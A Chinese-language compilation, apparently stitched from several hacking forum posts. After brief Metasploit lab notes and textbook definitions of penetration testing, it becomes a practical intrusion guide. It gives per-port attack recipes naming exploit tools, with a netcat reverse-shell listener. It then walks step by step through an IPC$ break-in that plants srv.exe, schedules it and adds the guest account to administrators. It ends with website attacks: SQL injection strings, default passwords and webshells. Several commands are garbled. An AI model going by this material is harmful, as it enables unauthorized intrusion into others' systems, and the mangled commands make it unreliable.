(1)首先确定攻击对象是谁,在msf中使用search命令找到可能使用的漏洞攻击模块并进入攻击模
(2)用info查看漏洞信息,设置payload以及相应的一些参数
(3)根据其使用方法,或运行后直接提权,或建立网页等待访问然后攻击,或其他方式拷贝给靶机等待回连,具体情况具体分析
(4)成功提权或出现问题,出现问题时根据具体情况具体分析,msf中会给出一定的英文提示,要好好利用
(5)本实验能加深对msf的理解。exploit我理解为伪装以及攻击平台,payload我理解为各种shell,encode我理解伪装工具
1、渗透测试 (ration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。
2、渗透测试能够通过识别安全问题来帮助一个单位理解当前的安全状况。这使促使许多单位开发操作规划来减少攻击或误用的威胁。
3、渗透测试有时是作为外部审查的一部分而进行的。这种测试需要探查系统,以发现操作系统和任何网络服务,并检查这些网络服务有无漏洞。你可以用漏洞扫描器完成这些任务,但往往专业人士用的是不同的工具,而且他们比较熟悉这类替代性工具。
4、渗透测试的作用一方面在于,解释所用工具在探查过程中所得到的结果。只要手头有漏洞扫描器,谁都可以利用这种工具探查防火墙或者是网络的某些部分。但很少有人能全面地了解漏洞扫描器得到的结果,更别提另外进行测试,并证实漏洞扫描器所得报告的准确性了。
5、漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测(渗透攻击)行为。
6、漏洞扫描技术是一类重要的网络安全技术。它和防火墙、入侵检测系统互相配合,能够有效提高网络的安全性。通过对网络的扫描,网络管理员能了解网络的安全设置和运行的应用服务,及时发现安全漏洞,客观评估网络风险等级。网络管理员能根据扫描的结果更正网络安全漏洞和系统中的错误设置,在黑客攻击前进行防范。如果说防火墙和网络监视系统是被动的防御手段,那么安全扫描就是一种主动的防范措施,能有效避免黑客攻击行为,做到防患于未然。
7、网络安全事故后可以通过网络漏洞扫描/网络评估系统分析确定网络被攻击的漏洞所在,帮助弥补漏洞,尽可能多得提供资料方便调查攻击的来源。
8、互联网的安全主要分为网络运行安全和信息安全两部分。网络运行的安全主要包括以ChinaNet、ChinaGBN、等10大计算机信息系统的运行安全和其它专网的运行安全;信息安全包括接入的计算机、服务器、工作站等用来进行采集、加工、存储、传输、检索处理的人机系统的安全。网络漏洞扫描/网络评估系统能够积极的配合公安、保密部门组织的安全性检查。
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对
5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:& use $">\127.0.0.1IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:>copy srv.exe $">\127.0.0.1admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:& time [url=file://127.0.0.1/]file://127.0.0.1/[/url]
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:>at [url=file://127.0.0.1/]file://127.0.0.1/[/url] 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:& time [url=file://127.0.0.1/]file://127.0.0.1/[/url]
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:> 127.0.0.1 99
这里会用到命令吧,注意端口是99。默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个服务!这就要用到ntlm了
7.C:>copy ntlm.exe $">\127.0.0.1admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:WINNTsystem32>ntlm
输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用 start "来开启服务!
9. 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万
一,我们再把guest激活加到管理组
10. C:& user guest /active:yes
将对方的Guest用户激活
11. C:& user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:& localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)。
网站入侵一般的流程。。,以我的经验 ,ping 对方网站的IP,,使用X- 或流光扫描对方服务器的漏洞。,端口。 如果服务器存在漏洞的话。,可以考虑从服务器入手。找相应的入侵地方,服务器都拿吓下了。网站程序还不就是易如反掌。 从网站程序下手。。黑客界一句话说的好。没有入侵不了的服务器...网站,, ASP的话,可以尝试手工入侵。‘ar’=‘ar’ 等等ASP语句来查看SQL数据库漏洞..也可以使用明小子SQL或AD注入漏洞看看。。有的话,就可以 一步一步猜测出很多信息。对于入侵是有很大帮助的, 也可以进入后台,尝试普通的手法,例如,默认的管理员账号密码一般是 admin admin admin admin888 admin administrator admin ***** 可以尝试弱口令。。明小子也有这功能。, 这都是小手段。。 真的很多,,说几天都说不完。。
这个叫做web渗透,对网站漏洞检测然后根据漏洞去拿到webshell,然后就可以更改网站权限,通过webshell可以提权得到整个服务器的权限。
如果你想自己做,可以找一些网站检测的工具,比哪WVS,JSKY之类,对网站进行扫描。 当然,如果你懂具体的手工渗透技术,那就再结合手工渗透吧。 成都优创信安,专注于网络安全、网站检测、网站渗透、数据分析、安全加固。
一、网站设计,通常是ASP,PHP,JSP设计
二、安全性,高到低 JSP PHP ASP
三、漏洞存在比较多的是ASP程序,尤其是动网论坛(upfile.asp+工具)。经典的漏洞算是上传漏洞,很普遍。
*************************** 常见检测网站工具有: 阿D注入软件 检测存在SQL 明小子 NBSI3.0
***************************
--------------------------- 常见web木马有: asp/HPH/JSP/ASPX木马 webshell 一句话木马 ---------------------------
常见入侵网站方法:
数据库备份入侵 禁止asp,jpg,备份asp
抓包改包入侵 cookie 修改上传页面
.asp解析漏洞入侵 x.asp 1.jpg 1.asp IIS漏洞
一句话木马入侵 asp
ewebeditor编辑器漏洞入侵 asa 大马websehll
差异备份入侵
旁注入侵 a b c
--探测开放的服务
|-->溢出
|-->弱口令
|--查找敏感或者脆弱目录->分析网站目录结构
|--整站程序Bug 黑白盒测试 获取SHELL
|--nslookup 列出所有二级玉米 逐个分析
|--site:*** 关键字 ->探测弱口令
|--啊D寻找注入点----->注入
|---手工查找注入点->注入
|--拿C段机器-->提权-->嗅探+arp
|--收集一切能收集管理员信息 充分应用baidu google 实现社会工程序